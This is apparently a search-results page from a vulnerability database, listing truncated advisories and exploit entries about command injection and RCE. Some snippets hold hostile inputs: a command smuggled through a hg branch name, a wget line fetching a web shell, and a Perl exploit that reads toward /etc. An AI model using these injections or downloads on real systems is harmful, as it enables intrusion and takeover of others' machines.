Lucene search
K

31 matches found

Prion
Prion
added 2019/05/13 2:29 p.m.17 views

Command injection

In the /HNAP1/SetClientInfoDemo message, the AudioMute and AudioEnable parameters are vulnerable, and the vulnerabilities affect D-Link DIR-868L Rev.B 2.05B02 devices. In the SetClientInfoDemo.php source code, the AudioMute and AudioEnble parameters are saved in the ShellPath script file without...

7.5CVSS9.8AI score0.41606EPSS
Exploits2References1Affected Software1
Hacker One
Hacker One
added 2017/11/09 8:57 a.m.21 views

Phabricator: Command injection on Phabricator instance with an evil hg branch name

Hi phabricator, I found an evil branch name of hg a repo can lead to arbitrary command injection on phabricator instance. Here is the reproduction steps: 1. Monitor a remote mercurial repo with phabricator; 2. Create a branch and called "--config=hooks.pre-log=wget" on the remote; 3. After...

7.5AI score
Exploits0
0day.today
0day.today
added 2017/06/12 12:0 a.m.30 views

Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution Exploit

Exploit for linux platform in category remote exploits Exploit Title: Unauthenticated remote root code execution on logpoint 5.6.4 Date: 11/06/17 Exploit Author: agix Vendor Homepage: https://www.logpoint.com Version: logpoint 5.6.4 Tested on: 5.6.2 Vendor contact 19/04 Exploit details sent to th...

7.1AI score
Exploits0
0day.today
0day.today
added 2017/02/02 12:0 a.m.253 views

Netwave IP Camera Server password disclosure Exploit

A vulnerability in netwave IP Camera server for ipcameras. It is possible to read Wifi password It is possible to dump memory which leads to password disclosure shodan and zoomeye dorks are included multiple camera manufacturers are affected by this vulnerability Usage Info ./pownetwave.py...

6.9AI score
Exploits0
Exploit DB
Exploit DB
added 2014/03/31 12:0 a.m.50 views

plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak

Exploit Title: plexusCMS 0.5 XSS Remote Shell Exploit Google Dork: allinurl: plx-storage Date: 22.02.2013 Exploit Author: neglomaniac Vendor Homepage: http://plexus-cms.org/ Version: 0.5 --- FILES backdoor.php simple commend execute backdoor commands.txt list of useful commands for owning remote...

7.4AI score
Exploits0
w3af
w3af
added 2013/06/10 11:2 p.m.11 views

dot_listing

This plugin searches for the .listing file in all the directories and subdirectories that are sent as input and if found it will try to discover new URLs from its content. The .listing file holds information about the list of files in the current directory. These files are created when download...

7.3AI score
Exploits0
Metasploit
Metasploit
added 2013/05/12 1:46 p.m.32 views

SAP Management Console OSExecute Payload Execution

This module executes an arbitrary payload through the SAP Management Console SOAP Interface. A valid username and password for the SAP Management Console must be provided. This module has been tested successfully on both Windows and Linux platforms running SAP Netweaver. In order to exploit a Lin...

7.5AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2012/01/06 12:0 a.m.17 views

Successful Shell Attack Detected - Unix Failed 'wget' Command

Binary data 6134.prm...

7.3AI score
Exploits0
0day.today
0day.today
added 2010/05/19 12:0 a.m.15 views

linux/x86 execve("/usr/bin/wget", "aaaa"); - 42 bytes

Exploit for linux/x86 platform in category shellcode ===================================================== linux/x86 execve"/usr/bin/wget", "aaaa"; - 42 bytes ===================================================== / Title: Linux x86 execve"/usr/bin/wget", "aaaa"; - 42 bytes Author: Jonathan Salwan...

7AI score
Exploits0
Packet Storm
Packet Storm
added 2010/04/13 12:0 a.m.27 views

AuroraGPT 4 Command Execution

Title : AuroraGPT V4 RCE Vulnerability Author: Amoo Arash Date : 2010-04-11 Version : 4 InformatioN Title : AuroraGPT V4 RCE Vulnerability Author : Amoo Arash ExploiT Vulnerable File : http://127.0.0.1/index.php?view=help&faq=1&ref&cmd=Command ExploiT : wget example.com/shell.txt -O shell.php...

0.3AI score
Exploits0
seebug.org
seebug.org
added 2006/12/05 12:0 a.m.20 views

MattWrighttextcounter.pl远程执行命令漏洞 Exploit

No description provided by source. Doru Petrescu ([email protected])提供了如下测试代码: -- cut here -- !/usr/bin/perl $URL='http://dtp.kappa.ro/a/test.shtml'; please DO modify this $EMAIL='[email protected],root'; please DO modify this if $ARGV0 $CMD=$ARGV0; else $CMD="ps ax;cd ..;cd ..;cd ..;cd etc;cat...

7.1AI score
Exploits0
Rows per page
Query Builder